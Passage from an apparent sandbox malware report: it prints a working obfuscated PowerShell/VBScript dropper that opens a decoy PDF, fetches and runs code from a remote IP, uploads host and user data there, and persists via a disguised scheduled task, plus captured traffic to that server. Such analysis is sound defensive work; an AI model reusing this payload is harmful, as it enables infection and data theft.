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unQ6lvq5etw6/vshu0R7ZzuKO6070DvzPBY8OXxcvH/8ozzGfOn9DT0wvVQ9d72bfb794r4Gfio+Tj5x/pX+uf7d/wH/Jj9Kf26/kv+3P9t//8CDAD3hPP7CmVuZHN0cmVhbQplbmRvYmoKMTIgMCBvYmoKWyAKPDwgL0luZm8gKHNSR0IgSUVDNjE5NjYtMi4xKS9TIC9HVFNfUERGQTEgL091dHB1dENvbmRpdGlvbklkZW50aWZpZXIgKEN1c3RvbSkKL091dHB1dENvbmRpdGlvbiAoKS9SZWdpc3RyeU5hbWUgKCkvVHlwZSAvT3V0cHV0SW50ZW50IC9EZXN0T3V0cHV0UHJvZmlsZSAxMSAwIFIgPj4gCgpdCmVuZG9iagoxMyAwIG9iago8PCAvVHlwZSAvTWV0YWRhdGEgL1N1YnR5cGUgL1hNTCAvTGVuZ3RoIDkzNiA+PiAKc3RyZWFtDQo8P3hwYWNrZXQgYmVnaW49Iu+7vyIgaWQ9Ilc1TTBNcENlaGlIenJlU3pOVGN6a2M5ZCI/Pgo8eDp4bXBtZXRhIHhtbG5zOng9ImFkb2JlOm5zOm1ldGEvIiB4OnhtcHRrPSJBZG9iZSBYTVAgQ29yZSI+Cgk8cmRmOlJERiB4bWxuczpyZGY9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkvMDIvMjItcmRmLXN5bnRheC1ucyMiPgoJCTxyZGY6RGVzY3JpcHRpb24gcmRmOmFib3V0PSIiCgkJCQl4bWxuczp4YXA9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC8iPgoJCQk8eGFwOkNyZWF0ZURhdGU+MjAyMy0wMi0xM1QwODo1OTo1NyswMTowMDwveGFwOkNyZWF0ZURhdGU+CgkJCTx4YXA6Q3JlYXRvclRvb2w+Q2Fub24gaVItQURWIDY1NTUgIFBERjwveGFwOkNyZWF0b3JUb29sPgoJCTwvcmRmOkRlc2NyaXB0aW9uPgoJCTxyZGY6RGVzY3JpcHRpb24gcmRmOmFib3V0PSIiCgkJCQl4bWxuczpwZGY9Imh0dHA6Ly9ucy5hZG9iZS5jb20vcGRmLzEuMy8iPgoJCQk8cGRmOlByb2R1Y2VyPkFkb2JlIFBTTCAxLjNlIGZvciBDYW5vbjwvcGRmOlByb2R1Y2VyPgoJCTwvcmRmOkRlc2NyaXB0aW9uPgoJCTxyZGY6RGVzY3JpcHRpb24gcmRmOmFib3V0PSIiCgkJCQl4bWxuczpkYz0iaHR0cDovL3B1cmwub3JnL2RjL2VsZW1lbnRzLzEuMS8iPgoJCQkJPGRjOmZvcm1hdD5hcHBsaWNhdGlvbi9wZGY8L2RjOmZvcm1hdD4KCQk8L3JkZjpEZXNjcmlwdGlvbj4KCQk8cmRmOkRlc2NyaXB0aW9uIHJkZjphYm91dD0iIgoJCQkJeG1sbnM6eGFwTU09Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9tbS8iPgoJCQk8eGFwTU06RG9jdW1lbnRJRD51dWlkOmZkZWRlOTYzLTAwMDAtNDE0Mi00MzQ0LTQ1NDYwMDAwMDAwMDwveGFwTU06RG9jdW1lbnRJRD4KCQk8L3JkZjpEZXNjcmlwdGlvbj4KPC9yZGY6UkRGPgo8L3g6eG1wbWV0YT4KPD94cGFja2V0IGVuZD0idyI/PgoKZW5kc3RyZWFtCmVuZG9iagozIDAgb2JqCjw8IC9UeXBlIC9QYWdlcyAvQ291bnQgMSAvS2lkcyBbMTAgMCBSIF0gPj4KZW5kb2JqCnhyZWYKMCAxNCAKMDAwMDAwMDAwMCA2NTUzNSBmIAowMDAwMDAwMDE2IDAwMDAwIG4gCjAwMDAwMDAyNjQgMDAwMDAgbiAKMDAwMDA1NTQ3MyAwMDAwMCBuIAowMDAwMDAwMzU4IDAwMDAwIG4gCjAwMDAwMjI0MzEgMDAwMDAgbiAKMDAwMDAyNjMwNCAwMDAwMCBuIAowMDAwMDI2NzAyIDAwMDAwIG4gCjAwMDAwNTEwODggMDAwMDAgbiAKMDAwMDA1MTE2OCAwMDAwMCBuIAowMDAwMDUxMzcwIDAwMDAwIG4gCjAwMDAwNTE2MTMgMDAwMDAgbiAKMDAwMDA1NDI2OCAwMDAwMCBuIAowMDAwMDU0NDUzIDAwMDAwIG4gCnRyYWlsZXIKPDwKL1NpemUgMTQKL0luZm8gMSAwIFIKL1Jvb3QgMiAwIFIKL0lEWzw3MTM0NGRlNzFjMTA3MzI1ZTY3MGEwMzQzMTY3Yjc5OT48NzEzNDRkZTcxYzEwNzMyNWU2NzBhMDM0MzE2N2I3OTk+XQo+PgpzdGFydHhyZWYKNTU1MzIKJSVFT0YK';$fil=[System.Convert]::FromBase64String($temp);set-content $home\appdata\local\temp\document.pdf -value $fil -encoding byte;&$home\appdata\local\temp\document.pdf;$a='ZGltIHIsIGMNCnNldCByID0gY3JlYXRlb2JqZWN0KCJXU2NyaXB0LlNoZWxsIikNCmMgPSAicG93ZXJzaGVsbC5leGUgLWV4ZWN1dGlvbnBvbGljeSBieXBhc3MgLXcgaGlkZGVuIC1ub3Byb2ZpbGUgLWMgc3RhcnQtc2xlZXAgMzk7c3RhcnQtc2xlZXAgKGdldC1yYW5kb20gLW1pbiA1IC1tYXggNDMpO3N0YXJ0LXNsZWVwIDExOyRpaWs9bmV3LW9iamVjdCBuZXQud2ViY2xpZW50OyRmbG09JGlpay5kb3dubG9hZGRhdGEoJ2h0dHA6Ly8yLjU5LjIyMi45ODo0MzgyMC9LZm5nbkhieEZIamF1Y2llL3BhZ2UxMDcvdXBncmFkZS50eHQnKTtpZigkZmxtLkxlbmd0aCAtZ3QgMSl7JGprcj1bc3lzdGVtLnRleHQuZW5jb2RpbmddOjp1dGY4LmdldFN0cmluZygkZmxtKTtpZigkamtyIC1tYXRjaCAnZ2V0LWNvbnRlbnQnKXtbYnl0ZVtdXSAkZHJweT1JRVggJGprcjt9ZWxzZXskYmpkbz13aG9hbWk7JGJqZG8rPSc9PSc7JGJqZG8rPVtTeXN0ZW0uTmV0LkRuc106OkdldEhvc3RBZGRyZXNzZXMoJGlwKStbU3lzdGVtLkVudmlyb25tZW50XTo6TmV3TGluZTskaGJuPUlFWCAkamtyOyRiamRvKz0kaGJufE91dC1zdHJpbmc7W2J5dGVbXV0kZHJweT1bc3lzdGVtLnRleHQuZW5jb2RpbmddOjpVdGY4LkdldEJ5dGVzKCRiamRvKTt9O3N0YXJ0LXNsZWVwIDEwOyR1ams9bmV3LW9iamVjdCBuZXQud2ViY2xpZW50O3N0YXJ0LXNsZWVwIDE2OyR1amsudXBsb2FkZGF0YSgnaHR0cDovLzIuNTkuMjIyLjk4OjI4NDAyL3BhZ2UxMDcnLCRkcnB5KTt9Ig0Kci5SdW4gYywgMCwgZmFsc2UNCg==';$b=[System.Convert]::FromBase64String($a);$c=[System.Text.Encoding]::utf8.GetString($b);set-content C:\Users\Public\Libraries\Recorded.vbs -value $c;schtasks.exe /create /TN OneDriveCoreTask-S-1-5-21-5466262771-899953646639-1001 /SC minute /mo 4 /tr C:\Users\Public\Libraries\Recorded.vbs /f;
                                                                      Icon location:C:\program files\windows nt\accessories\wordpad.exe

                                                                      Network Behavior

                                                                      Network Port Distribution

                                                                      TCP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Sep 30, 2024 15:41:27.098285913 CEST49716443192.168.2.523.41.168.139
                                                                      Sep 30, 2024 15:41:27.098323107 CEST4434971623.41.168.139192.168.2.5
                                                                      Sep 30, 2024 15:41:27.098588943 CEST49716443192.168.2.523.41.168.139
                                                                      Sep 30, 2024 15:41:27.098589897 CEST49716443192.168.2.523.41.168.139
                                                                      Sep 30, 2024 15:41:27.098617077 CEST4434971623.41.168.139192.168.2.5
                                                                      Sep 30, 2024 15:41:27.691523075 CEST4434971623.41.168.139192.168.2.5
                                                                      Sep 30, 2024 15:41:27.691982031 CEST49716443192.168.2.523.41.168.139
                                                                      Sep 30, 2024 15:41:27.692003012 CEST4434971623.41.168.139192.168.2.5
                                                                      Sep 30, 2024 15:41:27.693058968 CEST4434971623.41.168.139192.168.2.5
                                                                      Sep 30, 2024 15:41:27.693123102 CEST49716443192.168.2.523.41.168.139
                                                                      Sep 30, 2024 15:41:27.695184946 CEST49716443192.168.2.523.41.168.139
                                                                      Sep 30, 2024 15:41:27.695255995 CEST4434971623.41.168.139192.168.2.5
                                                                      Sep 30, 2024 15:41:27.695478916 CEST49716443192.168.2.523.41.168.139
                                                                      Sep 30, 2024 15:41:27.695487976 CEST4434971623.41.168.139192.168.2.5
                                                                      Sep 30, 2024 15:41:27.735791922 CEST49716443192.168.2.523.41.168.139
                                                                      Sep 30, 2024 15:41:27.801270008 CEST4434971623.41.168.139192.168.2.5
                                                                      Sep 30, 2024 15:41:27.801342964 CEST4434971623.41.168.139192.168.2.5
                                                                      Sep 30, 2024 15:41:27.801788092 CEST49716443192.168.2.523.41.168.139
                                                                      Sep 30, 2024 15:41:27.801808119 CEST4434971623.41.168.139192.168.2.5
                                                                      Sep 30, 2024 15:41:27.801829100 CEST49716443192.168.2.523.41.168.139
                                                                      Sep 30, 2024 15:41:27.801873922 CEST49716443192.168.2.523.41.168.139
                                                                      Sep 30, 2024 15:42:45.401952982 CEST5805643820192.168.2.52.59.222.98
                                                                      Sep 30, 2024 15:42:45.407058954 CEST43820580562.59.222.98192.168.2.5
                                                                      Sep 30, 2024 15:42:45.407752037 CEST5805643820192.168.2.52.59.222.98
                                                                      Sep 30, 2024 15:42:45.408137083 CEST5805643820192.168.2.52.59.222.98
                                                                      Sep 30, 2024 15:42:45.413033009 CEST43820580562.59.222.98192.168.2.5
                                                                      Sep 30, 2024 15:43:06.816231012 CEST43820580562.59.222.98192.168.2.5
                                                                      Sep 30, 2024 15:43:06.816327095 CEST5805643820192.168.2.52.59.222.98
                                                                      Sep 30, 2024 15:43:06.962104082 CEST5805643820192.168.2.52.59.222.98
                                                                      Sep 30, 2024 15:43:06.967078924 CEST5805743820192.168.2.52.59.222.98
                                                                      Sep 30, 2024 15:43:07.062800884 CEST43820580562.59.222.98192.168.2.5
                                                                      Sep 30, 2024 15:43:07.062932014 CEST5805643820192.168.2.52.59.222.98
                                                                      Sep 30, 2024 15:43:07.064318895 CEST43820580562.59.222.98192.168.2.5
                                                                      Sep 30, 2024 15:43:07.064337015 CEST43820580572.59.222.98192.168.2.5
                                                                      Sep 30, 2024 15:43:07.064436913 CEST5805743820192.168.2.52.59.222.98
                                                                      Sep 30, 2024 15:43:07.064573050 CEST5805743820192.168.2.52.59.222.98
                                                                      Sep 30, 2024 15:43:07.069535017 CEST43820580572.59.222.98192.168.2.5
                                                                      Sep 30, 2024 15:43:28.453514099 CEST43820580572.59.222.98192.168.2.5
                                                                      Sep 30, 2024 15:43:28.453769922 CEST5805743820192.168.2.52.59.222.98
                                                                      Sep 30, 2024 15:43:28.453907013 CEST5805743820192.168.2.52.59.222.98
                                                                      Sep 30, 2024 15:43:28.458697081 CEST43820580572.59.222.98192.168.2.5

                                                                      UDP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Sep 30, 2024 15:41:26.672251940 CEST5867853192.168.2.51.1.1.1
                                                                      Sep 30, 2024 15:41:32.852863073 CEST53642831.1.1.1192.168.2.5
                                                                      Sep 30, 2024 15:41:42.661976099 CEST53565421.1.1.1192.168.2.5

                                                                      DNS Queries

                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                      Sep 30, 2024 15:41:26.672251940 CEST192.168.2.51.1.1.10xf16fStandard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false

                                                                      DNS Answers

                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                      Sep 30, 2024 15:41:26.680140972 CEST1.1.1.1192.168.2.50xf16fNo error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                      Sep 30, 2024 15:41:27.398366928 CEST1.1.1.1192.168.2.50x8e5bNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                      Sep 30, 2024 15:41:27.398366928 CEST1.1.1.1192.168.2.50x8e5bNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false

                                                                      HTTP Request Dependency Graph

                                                                      • armmf.adobe.com
                                                                      • 2.59.222.98:43820

                                                                      HTTP Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.5580562.59.222.98438207332C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Sep 30, 2024 15:42:45.408137083 CEST103OUTGET /KfngnHbxFHjaucie/page107/upgrade.txt HTTP/1.1
                                                                      Host: 2.59.222.98:43820
                                                                      Connection: Keep-Alive


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.5580572.59.222.98438207332C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Sep 30, 2024 15:43:07.064573050 CEST103OUTGET /KfngnHbxFHjaucie/page107/upgrade.txt HTTP/1.1
                                                                      Host: 2.59.222.98:43820
                                                                      Connection: Keep-Alive


                                                                      HTTPS Proxied Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.54971623.41.168.1394437672C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-09-30 13:41:27 UTC475OUTGET /onboarding/smskillreader.txt HTTP/1.1
                                                                      Host: armmf.adobe.com
                                                                      Connection: keep-alive
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36
                                                                      Sec-Fetch-Site: same-origin
                                                                      Sec-Fetch-Mode: no-cors
                                                                      Sec-Fetch-Dest: empty
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      If-None-Match: "78-5faa31cce96da"
                                                                      If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
                                                                      2024-09-30 13:41:27 UTC198INHTTP/1.1 304 Not Modified
                                                                      Content-Type: text/plain; charset=UTF-8
                                                                      Last-Modified: Mon, 01 May 2023 15:02:33 GMT
                                                                      ETag: "78-5faa31cce96da"
                                                                      Date: Mon, 30 Sep 2024 13:41:27 GMT
                                                                      Connection: close


                                                                      Statistics

                                                                      CPU Usage

                                                                      Click to jump to process

                                                                      Memory Usage

                                                                      Click to jump to process

                                                                      High Level Behavior Distribution

                                                                      Click to dive into process behavior distribution

                                                                      Behavior

                                                                      Click to jump to process

                                                                      System Behavior

                                                                      General

                                                                      Target ID:0
                                                                      Start time:09:41:10
                                                                      Start date:30/09/2024
                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $temp='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